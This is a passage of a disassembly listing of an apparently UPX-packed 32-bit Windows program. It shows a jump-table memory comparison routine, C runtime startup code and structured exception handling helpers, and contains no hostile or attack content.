movzx edx, byte ptr [ecx-2]
movzx esi, byte ptr [eax-2]
sub esi, edx
jz loc_40350F ; jumptable 00402D43 case 1
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
test edx, edx
jnz loc_403D5F
jmp loc_40350F ; jumptable 00402D43 case 1
; ---------------------------------------------------------------------------
loc_403951: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-1Fh] ; jumptable 00402D43 case 31
cmp edx, [ecx-1Fh]
jz short loc_4039D7
movzx edx, byte ptr [ecx-1Fh]
movzx esi, byte ptr [eax-1Fh]
sub esi, edx
jz short loc_40397A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40397A: ; CODE XREF: sub_40287E+10E5�j
movzx esi, byte ptr [eax-1Eh]
movzx edx, byte ptr [ecx-1Eh]
sub esi, edx
jz short loc_40399B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40399B: ; CODE XREF: sub_40287E+1106�j
movzx esi, byte ptr [eax-1Dh]
movzx edx, byte ptr [ecx-1Dh]
sub esi, edx
jz short loc_4039BC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4039BC: ; CODE XREF: sub_40287E+1127�j
movzx esi, byte ptr [eax-1Ch]
movzx edx, byte ptr [ecx-1Ch]
sub esi, edx
jz short loc_4039D9
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4039D9
; ---------------------------------------------------------------------------
loc_4039D7: ; CODE XREF: sub_40287E+10D9�j
xor esi, esi
loc_4039D9: ; CODE XREF: sub_40287E+1148�j
; sub_40287E+1157�j
test esi, esi
jnz loc_402D4A
loc_4039E1: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-1Bh] ; jumptable 00402D43 case 27
cmp edx, [ecx-1Bh]
jz short loc_403A66
movzx esi, dl
movzx edx, byte ptr [ecx-1Bh]
sub esi, edx
jz short loc_403A09
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403A09: ; CODE XREF: sub_40287E+1174�j
movzx esi, byte ptr [eax-1Ah]
movzx edx, byte ptr [ecx-1Ah]
sub esi, edx
jz short loc_403A2A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403A2A: ; CODE XREF: sub_40287E+1195�j
movzx esi, byte ptr [eax-19h]
movzx edx, byte ptr [ecx-19h]
sub esi, edx
jz short loc_403A4B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403A4B: ; CODE XREF: sub_40287E+11B6�j
movzx esi, byte ptr [eax-18h]
movzx edx, byte ptr [ecx-18h]
sub esi, edx
jz short loc_403A68
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403A68
; ---------------------------------------------------------------------------
loc_403A66: ; CODE XREF: sub_40287E+1169�j
xor esi, esi
loc_403A68: ; CODE XREF: sub_40287E+11D7�j
; sub_40287E+11E6�j
test esi, esi
jnz loc_402D4A
loc_403A70: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-17h] ; jumptable 00402D43 case 23
cmp edx, [ecx-17h]
jz short loc_403AF5
movzx esi, dl
movzx edx, byte ptr [ecx-17h]
sub esi, edx
jz short loc_403A98
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403A98: ; CODE XREF: sub_40287E+1203�j
movzx esi, byte ptr [eax-16h]
movzx edx, byte ptr [ecx-16h]
sub esi, edx
jz short loc_403AB9
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403AB9: ; CODE XREF: sub_40287E+1224�j
movzx esi, byte ptr [eax-15h]
movzx edx, byte ptr [ecx-15h]
sub esi, edx
jz short loc_403ADA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403ADA: ; CODE XREF: sub_40287E+1245�j
movzx esi, byte ptr [eax-14h]
movzx edx, byte ptr [ecx-14h]
sub esi, edx
jz short loc_403AF7
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403AF7
; ---------------------------------------------------------------------------
loc_403AF5: ; CODE XREF: sub_40287E+11F8�j
xor esi, esi
loc_403AF7: ; CODE XREF: sub_40287E+1266�j
; sub_40287E+1275�j
test esi, esi
jnz loc_402D4A
loc_403AFF: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-13h] ; jumptable 00402D43 case 19
cmp edx, [ecx-13h]
jz short loc_403B84
movzx esi, dl
movzx edx, byte ptr [ecx-13h]
sub esi, edx
jz short loc_403B27
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403B27: ; CODE XREF: sub_40287E+1292�j
movzx esi, byte ptr [eax-12h]
movzx edx, byte ptr [ecx-12h]
sub esi, edx
jz short loc_403B48
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403B48: ; CODE XREF: sub_40287E+12B3�j
movzx esi, byte ptr [eax-11h]
movzx edx, byte ptr [ecx-11h]
sub esi, edx
jz short loc_403B69
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403B69: ; CODE XREF: sub_40287E+12D4�j
movzx esi, byte ptr [eax-10h]
movzx edx, byte ptr [ecx-10h]
sub esi, edx
jz short loc_403B86
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403B86
; ---------------------------------------------------------------------------
loc_403B84: ; CODE XREF: sub_40287E+1287�j
xor esi, esi
loc_403B86: ; CODE XREF: sub_40287E+12F5�j
; sub_40287E+1304�j
test esi, esi
jnz loc_402D4A
loc_403B8E: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-0Fh] ; jumptable 00402D43 case 15
cmp edx, [ecx-0Fh]
jz short loc_403C14
movzx edx, byte ptr [ecx-0Fh]
movzx esi, byte ptr [eax-0Fh]
sub esi, edx
jz short loc_403BB7
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403BB7: ; CODE XREF: sub_40287E+1322�j
movzx esi, byte ptr [eax-0Eh]
movzx edx, byte ptr [ecx-0Eh]
sub esi, edx
jz short loc_403BD8
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403BD8: ; CODE XREF: sub_40287E+1343�j
movzx esi, byte ptr [eax-0Dh]
movzx edx, byte ptr [ecx-0Dh]
sub esi, edx
jz short loc_403BF9
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403BF9: ; CODE XREF: sub_40287E+1364�j
movzx esi, byte ptr [eax-0Ch]
movzx edx, byte ptr [ecx-0Ch]
sub esi, edx
jz short loc_403C16
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403C16
; ---------------------------------------------------------------------------
loc_403C14: ; CODE XREF: sub_40287E+1316�j
xor esi, esi
loc_403C16: ; CODE XREF: sub_40287E+1385�j
; sub_40287E+1394�j
test esi, esi
jnz loc_402D4A
loc_403C1E: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-0Bh] ; jumptable 00402D43 case 11
cmp edx, [ecx-0Bh]
jz short loc_403CA3
movzx esi, dl
movzx edx, byte ptr [ecx-0Bh]
sub esi, edx
jz short loc_403C46
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403C46: ; CODE XREF: sub_40287E+13B1�j
movzx esi, byte ptr [eax-0Ah]
movzx edx, byte ptr [ecx-0Ah]
sub esi, edx
jz short loc_403C67
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403C67: ; CODE XREF: sub_40287E+13D2�j
movzx esi, byte ptr [eax-9]
movzx edx, byte ptr [ecx-9]
sub esi, edx
jz short loc_403C88
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403C88: ; CODE XREF: sub_40287E+13F3�j
movzx esi, byte ptr [eax-8]
movzx edx, byte ptr [ecx-8]
sub esi, edx
jz short loc_403CA5
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403CA5
; ---------------------------------------------------------------------------
loc_403CA3: ; CODE XREF: sub_40287E+13A6�j
xor esi, esi
loc_403CA5: ; CODE XREF: sub_40287E+1414�j
; sub_40287E+1423�j
test esi, esi
jnz loc_402D4A
loc_403CAD: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-7] ; jumptable 00402D43 case 7
cmp edx, [ecx-7]
jz short loc_403D32
movzx esi, dl
movzx edx, byte ptr [ecx-7]
sub esi, edx
jz short loc_403CD5
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403CD5: ; CODE XREF: sub_40287E+1440�j
movzx esi, byte ptr [eax-6]
movzx edx, byte ptr [ecx-6]
sub esi, edx
jz short loc_403CF6
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403CF6: ; CODE XREF: sub_40287E+1461�j
movzx esi, byte ptr [eax-5]
movzx edx, byte ptr [ecx-5]
sub esi, edx
jz short loc_403D17
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403D17: ; CODE XREF: sub_40287E+1482�j
movzx esi, byte ptr [eax-4]
movzx edx, byte ptr [ecx-4]
sub esi, edx
jz short loc_403D34
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403D34
; ---------------------------------------------------------------------------
loc_403D32: ; CODE XREF: sub_40287E+1435�j
xor esi, esi
loc_403D34: ; CODE XREF: sub_40287E+14A3�j
; sub_40287E+14B2�j
test esi, esi
jnz loc_402D4A
loc_403D3C: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
movzx esi, byte ptr [eax-3] ; jumptable 00402D43 case 3
movzx edx, byte ptr [ecx-3]
sub esi, edx
jz loc_403929
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
test edx, edx
jz loc_403929
loc_403D5F: ; CODE XREF: sub_40287E+10C8�j
mov eax, edx
jmp loc_40311F
; ---------------------------------------------------------------------------
loc_403D66: ; CODE XREF: sub_40287E+29�j
mov ecx, [ebp+arg_0]
mov esi, [ebp+arg_4]
movzx eax, byte ptr [ecx]
movzx edx, byte ptr [esi]
sub eax, edx
jz short loc_403D8B
xor edx, edx
test eax, eax
setnle dl
lea edx, [edx+edx-1]
mov eax, edx
test eax, eax
jnz loc_403E78
loc_403D8B: ; CODE XREF: sub_40287E+14F6�j
movzx eax, byte ptr [ecx+1]
movzx edx, byte ptr [esi+1]
sub eax, edx
jz short loc_403DAC
xor edx, edx
test eax, eax
setnle dl
lea edx, [edx+edx-1]
mov eax, edx
test eax, eax
jnz loc_403E78
loc_403DAC: ; CODE XREF: sub_40287E+1517�j
movzx eax, byte ptr [ecx+2]
movzx edx, byte ptr [esi+2]
sub eax, edx
jz short loc_403DCD
xor edx, edx
test eax, eax
setnle dl
lea edx, [edx+edx-1]
mov eax, edx
test eax, eax
jnz loc_403E78
loc_403DCD: ; CODE XREF: sub_40287E+1538�j
movzx eax, byte ptr [ecx+3]
movzx ecx, byte ptr [esi+3]
loc_403DD5: ; CODE XREF: sub_40287E+15B7�j
; sub_40287E+15E2�j ...
sub eax, ecx
jz loc_403E78
xor ecx, ecx
test eax, eax
setnle cl
lea ecx, [ecx+ecx-1]
mov eax, ecx
jmp loc_403E78
; ---------------------------------------------------------------------------
loc_403DEF: ; CODE XREF: sub_40287E+22�j
mov ecx, [ebp+arg_0]
mov esi, [ebp+arg_4]
movzx eax, byte ptr [ecx]
movzx edx, byte ptr [esi]
sub eax, edx
jz short loc_403E10
xor edx, edx
test eax, eax
setnle dl
lea edx, [edx+edx-1]
mov eax, edx
test eax, eax
jnz short loc_403E78
loc_403E10: ; CODE XREF: sub_40287E+157F�j
movzx eax, byte ptr [ecx+1]
movzx edx, byte ptr [esi+1]
sub eax, edx
jz short loc_403E2D
xor edx, edx
test eax, eax
setnle dl
lea edx, [edx+edx-1]
mov eax, edx
test eax, eax
jnz short loc_403E78
loc_403E2D: ; CODE XREF: sub_40287E+159C�j
movzx eax, byte ptr [ecx+2]
movzx ecx, byte ptr [esi+2]
jmp short loc_403DD5
; ---------------------------------------------------------------------------
loc_403E37: ; CODE XREF: sub_40287E+1B�j
mov ecx, [ebp+arg_0]
mov esi, [ebp+arg_4]
movzx eax, byte ptr [ecx]
movzx edx, byte ptr [esi]
sub eax, edx
jz short loc_403E58
xor edx, edx
test eax, eax
setnle dl
lea edx, [edx+edx-1]
mov eax, edx
test eax, eax
jnz short loc_403E78
loc_403E58: ; CODE XREF: sub_40287E+15C7�j
movzx eax, byte ptr [ecx+1]
movzx ecx, byte ptr [esi+1]
jmp loc_403DD5
; ---------------------------------------------------------------------------
loc_403E65: ; CODE XREF: sub_40287E+14�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
jmp loc_403DD5
; ---------------------------------------------------------------------------
loc_403E76: ; CODE XREF: sub_40287E+D�j
xor eax, eax
loc_403E78: ; CODE XREF: sub_40287E+8A2�j
; sub_40287E+1507�j ...
pop edi
pop esi
pop ebp
retn
sub_40287E endp
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
off_403E7E dd offset loc_40311D ; DATA XREF: sub_40287E+4C5�r
dd offset loc_40350F ; jump table for switch statement
dd offset loc_40391B
dd offset loc_403D3C
dd offset loc_4030A0
dd offset loc_403480
dd offset loc_40388C
dd offset loc_403CAD
dd offset loc_403011
dd offset loc_4033F0
dd offset loc_4037FC
dd offset loc_403C1E
dd offset loc_402F81
dd offset loc_403361
dd offset loc_40376D
dd offset loc_403B8E
dd offset loc_402EF2
dd offset loc_4032D2
dd offset loc_4036DE
dd offset loc_403AFF
dd offset loc_402E63
dd offset loc_403243
dd offset loc_40364F
dd offset loc_403A70
dd offset loc_402DD4
dd offset loc_4031B4
dd offset loc_4035C0
dd offset loc_4039E1
dd offset loc_402D51
dd offset loc_403125
dd offset loc_403531
dd offset loc_403951
; =============== S U B R O U T I N E =======================================
sub_403EFE proc near ; CODE XREF: start-F98D�p start-F8F0�p ...
arg_0 = dword ptr 4
cmp ds:dword_40FE1C, 1
jnz short loc_403F0C
call sub_4060C3
loc_403F0C: ; CODE XREF: sub_403EFE+7�j
push [esp+arg_0]
call sub_405F23
push 0FFh
call sub_405593
pop ecx
pop ecx
retn
sub_403EFE endp
; =============== S U B R O U T I N E =======================================
sub_403F22 proc near ; CODE XREF: start-F908�p
cmp word ptr ds:400000h, 5A4Dh
jnz short loc_403F60
mov eax, ds:40003Ch
cmp dword ptr [eax+400000h], 4550h
jnz short loc_403F60
cmp word ptr [eax+400018h], 10Bh
jnz short loc_403F60
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_403F60
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403F60: ; CODE XREF: sub_403F22+9�j
; sub_403F22+1A�j ...
xor eax, eax
retn
sub_403F22 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_403F63: ; CODE XREF: start-F7E8�j
push 60h
push offset dword_40DE78
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call dword_40C058 ; GetStartupInfoA
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, dword_40C054
call ebx ; dword_40C054
push eax
call dword_40C050 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jnz short loc_403FAE
push 12h
call sub_403EFE
pop ecx
jmp loc_404138
; ---------------------------------------------------------------------------
loc_403FAE: ; CODE XREF: start-F991�j
mov [esi], edi
push esi
call dword_40C04C ; GetVersionExA
push esi
push 0
test eax, eax
jnz short loc_403FCC
call ebx ; dword_40C054
push eax
call dword_40C048 ; RtlFreeHeap
jmp loc_404138
; ---------------------------------------------------------------------------
loc_403FCC: ; CODE XREF: start-F974�j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx ; dword_40C054
push eax
call dword_40C048 ; RtlFreeHeap
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_403FFE
or edi, 8000h
loc_403FFE: ; CODE XREF: start-F93A�j
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov ds:dword_410160, esi
mov ds:dword_410168, eax
mov ds:dword_41016C, ecx
mov ds:dword_410170, edx
mov ds:dword_410164, edi
call sub_403F22
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
push ebx
call sub_4069FB
pop ecx
test eax, eax
jnz short loc_404046
push 1Ch
call sub_403EFE
pop ecx
loc_404046: ; CODE XREF: start-F8F4�j
call sub_404A60
test eax, eax
jnz short loc_404057
push 10h
call sub_403EFE
pop ecx
loc_404057: ; CODE XREF: start-F8E3�j
call sub_406958
mov [ebp-4], ebx
call sub_406718
test eax, eax
jge short loc_404070
push 1Bh
call sub_405549
pop ecx
loc_404070: ; CODE XREF: start-F8CA�j
call dword_40C044 ; GetCommandLineA
mov ds:dword_410A24, eax
call sub_4065E3
mov ds:dword_40FE14, eax
call sub_40652A
test eax, eax
jge short loc_404096
push 8
call sub_405549
pop ecx
loc_404096: ; CODE XREF: start-F8A4�j
call sub_4062B7
test eax, eax
jge short loc_4040A7
push 9
call sub_405549
pop ecx
loc_4040A7: ; CODE XREF: start-F893�j
push ebx
call sub_405665
pop ecx
test eax, eax
jz short loc_4040B9
push eax
call sub_405549
pop ecx
loc_4040B9: ; CODE XREF: start-F880�j
call sub_40625A
test [ebp-44h], bl
jz short loc_4040C9
movzx ecx, word ptr [ebp-40h]
jmp short loc_4040CC
; ---------------------------------------------------------------------------
loc_4040C9: ; CODE XREF: start-F86F�j
push 0Ah
pop ecx
loc_4040CC: ; CODE XREF: start-F869�j
push ecx
push eax
push 0
push 400000h
call sub_401000
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040E9
push eax
call sub_4057D9
loc_4040E9: ; CODE XREF: start-F84F�j
call sub_4057FB
jmp short loc_40411E
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_4060FC
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_404119
push eax
call sub_4057EA
loc_404119: ; CODE XREF: UPX0:00404111�j
call sub_40580A
; START OF FUNCTION CHUNK FOR start
loc_40411E: ; CODE XREF: start-F842�j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_40413D
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
; START OF FUNCTION CHUNK FOR start
loc_404138: ; CODE XREF: start-F987�j start-F969�j
mov eax, 0FFh
loc_40413D: ; CODE XREF: start-F808�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_404143: ; CODE XREF: start+183�j
call sub_406A55
jmp loc_403F63
; END OF FUNCTION CHUNK FOR start
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40414D proc near ; CODE XREF: sub_401548+57�p
; sub_401606+58�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_40C1F0
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_404180
test byte ptr [eax], 8
jz short loc_404180
mov [ebp+var_C], 1994000h
loc_404180: ; CODE XREF: sub_40414D+25�j
; sub_40414D+2A�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_40C05C ; RaiseException
leave
retn 8
sub_40414D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404197 proc near ; CODE XREF: sub_4071C3+65�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov ebp, [ebp+var_4]
mov esp, [ebx-4]
jmp eax
sub_404197 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_4041C7 proc near ; CODE XREF: sub_406CDC+31�p
; sub_407132+59�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4041C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041CE proc near ; CODE XREF: sub_40435B+69�p
; sub_4071C3:loc_4071EB�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_4041F7
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_40B00E ; RtlUnwind
loc_4041F7: ; DATA XREF: sub_4041CE+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4041CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404220 proc near ; CODE XREF: UPX0:0040B032�j
; UPX0:0040B04D�j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push [ebp+var_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40768F
add esp, 20h
mov [ebp+var_8], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_404220 endp
; ---------------------------------------------------------------------------
loc_404256: ; DATA XREF: sub_404500+24�o
push esi
cld
mov esi, [esp+0Ch]
mov ecx, [esi+8]
xor ecx, esi
call sub_40224A
push 0
push esi
push dword ptr [esi+14h]
push dword ptr [esi+0Ch]
push 0
push dword ptr [esp+24h]
push dword ptr [esi+10h]
push dword ptr [esp+24h]
call sub_40768F
add esp, 20h
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404286 proc near ; CODE XREF: sub_40435B+81�p
; sub_40722F+53�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_4042A8
mov eax, offset loc_40432F
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_404358
; ---------------------------------------------------------------------------
loc_4042A8: ; CODE XREF: sub_404286+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_40435B
mov eax, ds:dword_40F060
lea ecx, [ebp+var_28]
xor eax, ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_38], 1
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov eax, [ebp+arg_8]
mov [ebp+var_30], eax
call sub_404927
mov eax, [eax+80h]
mov [ebp+var_2C], eax
lea eax, [ebp+var_34]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call [ebp+var_2C]
pop ecx
pop ecx
and [ebp+var_38], 0
loc_40432F: ; DATA XREF: sub_404286+10�o
cmp [ebp+var_4], 0
jz short loc_40434C
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_404355
; ---------------------------------------------------------------------------
loc_40434C: ; CODE XREF: sub_404286+AD�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_404355: ; CODE XREF: sub_404286+C4�j
mov eax, [ebp+var_38]
loc_404358: ; CODE XREF: sub_404286+1D�j
pop ebx
leave
retn
sub_404286 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; DATA XREF: sub_404286+26�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
xor ecx, [ebp+arg_4]
call sub_40224A
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_40438B
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_4043F5
; ---------------------------------------------------------------------------
jmp short loc_4043F5
; ---------------------------------------------------------------------------
loc_40438B: ; CODE XREF: sub_40435B+1D�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_40768F
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_4043C9
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4041CE
loc_4043C9: ; CODE XREF: sub_40435B+61�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_404286
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_4043F5: ; CODE XREF: sub_40435B+2C�j
; sub_40435B+2E�j
pop ebx
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043F8 proc near ; CODE XREF: sub_40722F+81�p
; sub_407321+1C6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
